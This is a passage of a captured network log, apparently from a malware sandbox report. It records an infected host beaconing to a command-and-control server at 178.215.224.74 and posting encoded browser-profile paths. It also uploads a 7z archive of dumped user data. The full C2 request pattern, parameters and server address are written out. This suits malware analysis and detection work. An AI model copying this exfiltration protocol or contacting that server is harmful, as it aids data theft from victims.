                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 8
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 64 6d 39 70 5a 67 3d 3d
                                        Data Ascii: dm9pZg==


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                        65 | 192.168.2.4 | 50067 | 178.215.224.74 | 80
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 21, 2024 20:02:13.812805891 CET | 118 | OUT | GET /v10/ukyh.php?jspo=35&xvgj=cXl1cC56aXA%3D HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:02:15.175194025 CET | 1236 | IN | HTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:02:14 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Vary: Accept-Encoding
                                        Transfer-Encoding: chunked
                                        Content-Type: text/html; charset=UTF-8


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                        66 | 192.168.2.4 | 50068 | 178.215.224.74 | 80
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 21, 2024 20:02:15.932701111 CET | 97 | OUT | GET /v10/ukyh.php?jspo=6 HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:02:17.215536118 CET | 203 | IN | HTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:02:16 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 62 68 6c 6f
                                        Data Ascii: bhlo


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                        67 | 192.168.2.4 | 50069 | 178.215.224.74 | 80
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 21, 2024 20:02:18.105129004 CET | 175 | OUT | GET /v10/ukyh.php?jspo=1&jwvs=9A5605DE11447A0E2031624EE8FBDE&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:02:19.431052923 CET | 207 | IN | HTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:02:19 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 8
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 64 6d 39 70 5a 67 3d 3d
                                        Data Ascii: dm9pZg==


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                        68 | 192.168.2.4 | 50070 | 178.215.224.74 | 80
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 21, 2024 20:02:18.161283016 CET | 97 | OUT | GET /v10/ukyh.php?jspo=6 HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:02:19.483735085 CET | 203 | IN | HTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:02:19 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 62 68 6c 6f
                                        Data Ascii: bhlo


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                        69 | 192.168.2.4 | 50071 | 178.215.224.74 | 80
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 21, 2024 20:02:19.657141924 CET | 629 | OUT | POST /v10/ukyh.php HTTP/1.1
                                        Accept: text/*
                                        Content-Type: application/x-www-form-urlencoded; charset=utf-8
                                        User-Agent: Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.04 (jaunty) Firefox/3.5
                                        Host: 178.215.224.74
                                        Content-Length: 335
                                        Cache-Control: no-cache
                                        Data Raw: 6a 73 70 6f 3d 33 34 26 6a 77 76 73 3d 39 41 35 36 30 35 44 45 31 31 34 34 37 41 30 45 32 30 33 31 36 32 34 45 45 38 46 42 44 45 26 6d 65 6c 71 3d 4d 54 41 77 4b 44 6b 79 4d 44 45 34 4b 44 4d 25 32 46 4f 43 77 77 4d 7a 63 73 4d 44 49 32 4a 6a 6f 33 4d 46 74 43 58 54 45 77 4d 43 6f 78 4d 6a 67 7a 4d 69 6f 78 4e 54 6f 75 4d 6a 4d 31 4c 6a 49 77 4e 43 59 33 4e 6c 6c 41 58 54 4d 77 4d 69 67 7a 4d 44 49 7a 4d 79 6f 78 4e 7a 6f 6d 4d 44 45 31 4a 6a 41 77 50 43 34 31 4e 6c 6c 43 58 7a 41 71 4d 44 67 39 4b 45 45 36 58 6c 56 7a 5a 58 4a 7a 58 47 68 6e 62 47 56 7a 58 45 4e 79 63 45 52 6a 64 47 46 63 55 47 39 70 62 57 74 73 5a 31 78 47 62 32 35 79 61 6d 6c 73 52 6e 64 74 63 48 4e 65 65 58 74 31 63 43 5a 34 61 33 68 62 51 6c 38 7a 4d 6a 49 6f 4d 54 49 35 4f 6a 45 6f 51 7a 68 63 56 58 4e 6c 63 6e 4e 65 59 6d 31 75 5a 58 4e 65 51 33 42 77 52 6d 46 30 59 56 35 53 5a 32 46 76 61 32 35 6e 58 6b 52 74 62 6e 4a 6f 61 32 78 47 64 57 31 77 63 56 52 7a 65 58 56 34 4c 48 68 68 63 46 6c 43 58 77 25 33 44 25 33 44
                                        Data Ascii: jspo=34&jwvs=9A5605DE11447A0E2031624EE8FBDE&melq=MTAwKDkyMDE4KDM%2FOCwwMzcsMDI2Jjo3MFtCXTEwMCoxMjgzMioxNTouMjM1LjIwNCY3NllAXTMwMigzMDIzMyoxNzomMDE1JjAwPC41NllCXzAqMDg9KEE6XlVzZXJzXGhnbGVzXENycERjdGFcUG9pbWtsZ1xGb25yamlsRndtcHNeeXt1cCZ4a3hbQl8zMjIoMTI5OjEoQzhcVXNlcnNeYm1uZXNeQ3BwRmF0YV5SZ2Fva25nXkRtbnJoa2xGdW1wcVRzeXV4LHhhcFlCXw%3D%3D
                                        Nov 21, 2024 20:02:20.989624977 CET | 199 | IN | HTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:02:20 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 0
                                        Content-Type: text/html; charset=UTF-8


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                        70 | 192.168.2.4 | 50072 | 178.215.224.74 | 80
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 21, 2024 20:02:20.657553911 CET | 97 | OUT | GET /v10/ukyh.php?jspo=6 HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:02:22.030884981 CET | 203 | IN | HTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:02:21 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 62 68 6c 6f
                                        Data Ascii: bhlo


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                        71 | 192.168.2.4 | 50073 | 178.215.224.74 | 80
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 21, 2024 20:02:21.233371019 CET | 97 | OUT | GET /v10/ukyh.php?jspo=6 HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:02:22.497236967 CET | 203 | IN | HTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:02:22 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 62 68 6c 6f
                                        Data Ascii: bhlo


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                        72 | 192.168.2.4 | 50074 | 178.215.224.74 | 80
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 21, 2024 20:02:22.237582922 CET | 175 | OUT | GET /v10/ukyh.php?jspo=1&jwvs=9A5605DE11447A0E2031624EE8FBDE&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:02:23.593422890 CET | 207 | IN | HTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:02:23 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 8
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 64 6d 39 70 5a 67 3d 3d
                                        Data Ascii: dm9pZg==


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                        73 | 192.168.2.4 | 50075 | 178.215.224.74 | 80
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 21, 2024 20:02:22.696929932 CET | 97 | OUT | GET /v10/ukyh.php?jspo=8 HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:02:24.028208971 CET | 336 | IN | HTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:02:23 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Vary: Accept-Encoding
                                        Content-Length: 112
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 5a 6d 46 73 63 57 31 2b 4b 69 6f 69 51 6e 5a 36 64 57 64 43 64 6e 42 33 5a 79 6f 7a 4f 69 4a 6b 59 32 78 78 5a 58 35 6d 59 57 78 7a 5a 33 5a 43 64 48 4a 31 5a 79 68 6d 59 57 35 7a 5a 55 42 32 63 6e 31 6c 51 6d 52 68 62 48 46 6c 4b 43 67 6f 4b 6b 4a 6b 59 32 78 7a 5a 53 68 30 66 6b 42 6d 61 57 35 78 62 55 42 43 64 6e 42 33 5a 77 3d 3d
                                        Data Ascii: ZmFscW1+KioiQnZ6dWdCdnB3ZyozOiJkY2xxZX5mYWxzZ3ZCdHJ1ZyhmYW5zZUB2cn1lQmRhbHFlKCgoKkJkY2xzZSh0fkBmaW5xbUBCdnB3Zw==


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                        74 | 192.168.2.4 | 50076 | 178.215.224.74 | 80
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 21, 2024 20:02:24.267383099 CET | 97 | OUT | GET /v10/ukyh.php?jspo=6 HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:02:25.600330114 CET | 203 | IN | HTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:02:25 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 62 68 6c 6f
                                        Data Ascii: bhlo


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                        75 | 192.168.2.4 | 50077 | 178.215.224.74 | 80
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 21, 2024 20:02:24.315921068 CET | 97 | OUT | GET /v10/ukyh.php?jspo=6 HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:02:25.579082012 CET | 203 | IN | HTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:02:25 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 62 68 6c 6f
                                        Data Ascii: bhlo


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                        76 | 192.168.2.4 | 50078 | 178.215.224.74 | 80
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 21, 2024 20:02:26.054496050 CET | 136 | OUT | GET /v10/ukyh.php?jspo=2021&jwvs=9A5605DE11447A0E2031624EE8FBDE HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:02:27.427364111 CET | 199 | IN | HTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:02:27 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 0
                                        Content-Type: text/html; charset=UTF-8


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                        77 | 192.168.2.4 | 50079 | 178.215.224.74 | 80
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 21, 2024 20:02:26.062470913 CET | 175 | OUT | GET /v10/ukyh.php?jspo=1&jwvs=9A5605DE11447A0E2031624EE8FBDE&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:02:27.371377945 CET | 207 | IN | HTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:02:27 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 8
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 64 6d 39 70 5a 67 3d 3d
                                        Data Ascii: dm9pZg==


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                        78 | 192.168.2.4 | 50080 | 178.215.224.74 | 80
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 21, 2024 20:02:27.697149992 CET | 97 | OUT | GET /v10/ukyh.php?jspo=6 HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:02:29.023269892 CET | 203 | IN | HTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:02:28 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 62 68 6c 6f
                                        Data Ascii: bhlo


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                        79 | 192.168.2.4 | 50081 | 178.215.224.74 | 80
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 21, 2024 20:02:28.002587080 CET | 97 | OUT | GET /v10/ukyh.php?jspo=6 HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:02:29.314779997 CET | 203 | IN | HTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:02:29 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 62 68 6c 6f
                                        Data Ascii: bhlo


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                        80 | 192.168.2.4 | 50082 | 178.215.224.74 | 80
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 21, 2024 20:02:29.198939085 CET | 295 | OUT | POST /v10/ukyh.php HTTP/1.1
                                        Accept: text/*
                                        Content-Type: application/x-www-form-urlencoded; charset=utf-8
                                        User-Agent: Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.04 (jaunty) Firefox/3.5
                                        Host: 178.215.224.74
                                        Content-Length: 8387
                                        Cache-Control: no-cache
                                        Nov 21, 2024 20:02:29.199002028 CET | 8387 | OUT | Data Raw: 6a 73 70 6f 3d 32 30 31 34 26 6a 77 76 73 3d 39 41 35 36 30 35 44 45 31 31 34 34 37 41 30 45 32 30 33 31 36 32 34 45 45 38 46 42 44 45 26 6d 65 6c 71 3d 54 47 31 6b 64 47 6f 77 5a 48 4e 53 55 54 64 69 59 6a 41 79 4a 7a 46 47 66 6c 52 70 5a 45 31
                                        Data Ascii: jspo=2014&jwvs=9A5605DE11447A0E2031624EE8FBDE&melq=TG1kdGowZHNSUTdiYjAyJzFGflRpZE1%2BTncnM0QlM0R8T1xPek5UWzBNVGUyTURPMkdEW3pPVE8lMUZ%2BTVMnMUQlM0Z0T1ElO0YnO0R%2BZmhHdTElMEpjJzBCRDJBJTJGckk5Wk9YMkBaVXE0cFkyTkJLT3htWE9GaUhscHJ0RmBEc1BVYVt3S1JtdW
                                        Nov 21, 2024 20:02:30.513305902 CET | 199 | IN | HTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:02:30 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 0
                                        Content-Type: text/html; charset=UTF-8
                                        Nov 21, 2024 20:02:32.047432899 CET | 295 | OUT | POST /v10/ukyh.php HTTP/1.1
                                        Accept: text/*
                                        Content-Type: application/x-www-form-urlencoded; charset=utf-8
                                        User-Agent: Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.04 (jaunty) Firefox/3.5
                                        Host: 178.215.224.74
                                        Content-Length: 2463
                                        Cache-Control: no-cache
                                        Nov 21, 2024 20:02:32.047487974 CET | 2463 | OUT | Data Raw: 6a 73 70 6f 3d 32 30 31 35 26 6a 77 76 73 3d 39 41 35 36 30 35 44 45 31 31 34 34 37 41 30 45 32 30 33 31 36 32 34 45 45 38 46 42 44 45 26 6d 65 6c 71 3d 59 55 68 53 4d 6d 74 4b 54 54 5a 45 65 7a 74 6d 59 6e 73 33 64 6d 4e 56 54 48 6c 67 4f 30 5a
                                        Data Ascii: jspo=2015&jwvs=9A5605DE11447A0E2031624EE8FBDE&melq=YUhSMmtKTTZEeztmYns3dmNVTHlgO0Z0WG5TdVkyOXRMMFIxYkdsd2N5OCcyRmJFbH1hMG5rUFZnM09WVTJMZSUzRCc7RnxSUGpqalhAcVhaT2ViMFFvVjBab2FXTmxJSEBxYDJSMVsxUWdjMlY1YXlJdEtHMXBbM0h0YTI7b2ZDQlRmUEB3YjtIMkhhSlAy
                                        Nov 21, 2024 20:02:32.480151892 CET | 199 | IN | HTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:02:32 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 0
                                        Content-Type: text/html; charset=UTF-8
                                        Nov 21, 2024 20:02:34.031821966 CET | 295 | OUT | POST /v10/ukyh.php HTTP/1.1
                                        Accept: text/*
                                        Content-Type: application/x-www-form-urlencoded; charset=utf-8
                                        User-Agent: Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.04 (jaunty) Firefox/3.5
                                        Host: 178.215.224.74
                                        Content-Length: 1699
                                        Cache-Control: no-cache
                                        Nov 21, 2024 20:02:34.031888962 CET | 1699 | OUT | Data Raw: 6a 73 70 6f 3d 33 34 26 6a 77 76 73 3d 39 41 35 36 30 35 44 45 31 31 34 34 37 41 30 45 32 30 33 31 36 32 34 45 45 38 46 42 44 45 26 6d 65 6c 71 3d 4d 54 49 33 4b 44 41 7a 4f 43 70 4c 4f 46 35 64 63 32 64 77 63 56 35 6f 62 57 35 6e 65 31 52 44 63
                                        Data Ascii: jspo=34&jwvs=9A5605DE11447A0E2031624EE8FBDE&melq=MTI3KDAzOCpLOF5dc2dwcV5obW5ne1RDcnBGYXRhXExvYWluXEdvbWVsZV5DaHJtbW1cV3FlciJEY3ZjXFJwbWZpbGcoM1tAVTMwPyo6MzooQThcV3ttcHFcaG9uZXNcQXJ4RmF0YV5Ob2NjbFxHbW9vbGdeQ2hwb29nXlVxZ3AgRGF2aV5Qcmdka2RlIjBZQl
                                        Nov 21, 2024 20:02:34.468791008 CET | 199 | IN | HTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:02:34 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 0
                                        Content-Type: text/html; charset=UTF-8
                                        Nov 21, 2024 20:02:36.265197992 CET | 427 | OUT | POST /v10/ukyh.php HTTP/1.1
                                        Accept: text/*
                                        Content-Type: application/x-www-form-urlencoded; charset=utf-8
                                        User-Agent: Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.04 (jaunty) Firefox/3.5
                                        Host: 178.215.224.74
                                        Content-Length: 133
                                        Cache-Control: no-cache
                                        Data Raw: 6a 73 70 6f 3d 33 34 26 6a 77 76 73 3d 39 41 35 36 30 35 44 45 31 31 34 34 37 41 30 45 32 30 33 31 36 32 34 45 45 38 46 42 44 45 26 6d 65 6c 71 3d 4d 54 49 33 4b 44 6b 7a 4d 43 70 4c 4f 46 35 64 63 32 64 77 63 56 35 6f 62 57 35 6e 65 31 52 44 63 6e 42 47 59 58 52 68 58 46 4a 76 59 32 56 72 62 6d 64 63 54 32 31 36 61 57 35 73 59 56 78 45 61 58 70 6c 5a 47 31 34 58 46 6c 41 58 77 25 33 44 25 33 44
                                        Data Ascii: jspo=34&jwvs=9A5605DE11447A0E2031624EE8FBDE&melq=MTI3KDkzMCpLOF5dc2dwcV5obW5ne1RDcnBGYXRhXFJvY2VrbmdcT216aW5sYVxEaXplZG14XFlAXw%3D%3D
                                        Nov 21, 2024 20:02:36.688836098 CET | 199 | IN | HTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:02:36 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 0
                                        Content-Type: text/html; charset=UTF-8
                                        Nov 21, 2024 20:02:38.918868065 CET | 300 | OUT | POST /v10/ukyh.php?uvyw=6 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----974767299852498929531610575
                                        User-Agent: Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.04 (jaunty) Firefox/3.5
                                        Host: 178.215.224.74
                                        Content-Length: 29747
                                        Cache-Control: no-cache
                                        Nov 21, 2024 20:02:38.918972969 CET | 24720 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 39 37 34 37 36 37 32 39 39 38 35 32 34 39 38 39 32 39 35 33 31 36 31 30 35 37 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69
                                        Data Ascii: ------974767299852498929531610575Content-Disposition: form-data; name="file"; filename="C:\Users\user\AppData\Roaming\DolphinDumps\9A5605DE11447A0E2031624EE8FBDE_ff.7z"Content-Type: application/octet-stream7z'wr$
                                        Nov 21, 2024 20:02:39.500746965 CET | 199 | IN | HTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:02:39 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 0
                                        Content-Type: text/html; charset=UTF-8


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                        81 | 192.168.2.4 | 50083 | 178.215.224.74 | 80
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 21, 2024 20:02:30.193702936 CET | 175 | OUT | GET /v10/ukyh.php?jspo=1&jwvs=9A5605DE11447A0E2031624EE8FBDE&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:02:31.552397013 CET | 207 | IN | HTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:02:31 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 8
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 64 6d 39 70 5a 67 3d 3d
                                        Data Ascii: dm9pZg==


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                        82 | 192.168.2.4 | 50084 | 178.215.224.74 | 80
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 21, 2024 20:02:30.732347012 CET | 97 | OUT | GET /v10/ukyh.php?jspo=6 HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:02:31.994302034 CET | 203 | IN | HTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:02:31 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 62 68 6c 6f
                                        Data Ascii: bhlo


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                        83 | 192.168.2.4 | 50085 | 178.215.224.74 | 80
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 21, 2024 20:02:32.319092989 CET | 97 | OUT | GET /v10/ukyh.php?jspo=6 HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:02:33.591794968 CET | 203 | IN | HTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:02:33 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 62 68 6c 6f
                                        Data Ascii: bhlo


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                        84 | 192.168.2.4 | 50086 | 178.215.224.74 | 80
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 21, 2024 20:02:32.689687014 CET | 97 | OUT | GET /v10/ukyh.php?jspo=6 HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:02:34.010883093 CET | 203 | IN | HTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:02:33 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 62 68 6c 6f
                                        Data Ascii: bhlo


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                        85 | 192.168.2.4 | 50087 | 178.215.224.74 | 80
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 21, 2024 20:02:33.822293043 CET | 175 | OUT | GET /v10/ukyh.php?jspo=1&jwvs=9A5605DE11447A0E2031624EE8FBDE&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:02:35.180377007 CET | 207 | IN | HTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:02:34 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 8
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 64 6d 39 70 5a 67 3d 3d
                                        Data Ascii: dm9pZg==


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                        86 | 192.168.2.4 | 50088 | 178.215.224.74 | 80
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 21, 2024 20:02:34.885240078 CET | 97 | OUT | GET /v10/ukyh.php?jspo=6 HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:02:36.151442051 CET | 203 | IN | HTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:02:35 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 62 68 6c 6f
                                        Data Ascii: bhlo


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                        87 | 192.168.2.4 | 50089 | 178.215.224.74 | 80
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 21, 2024 20:02:35.799936056 CET | 97 | OUT | GET /v10/ukyh.php?jspo=6 HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:02:37.117151022 CET | 203 | IN | HTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:02:36 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 62 68 6c 6f
                                        Data Ascii: bhlo


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                        88 | 192.168.2.4 | 50090 | 178.215.224.74 | 80
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 21, 2024 20:02:37.571372032 CET | 175 | OUT | GET /v10/ukyh.php?jspo=1&jwvs=9A5605DE11447A0E2031624EE8FBDE&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
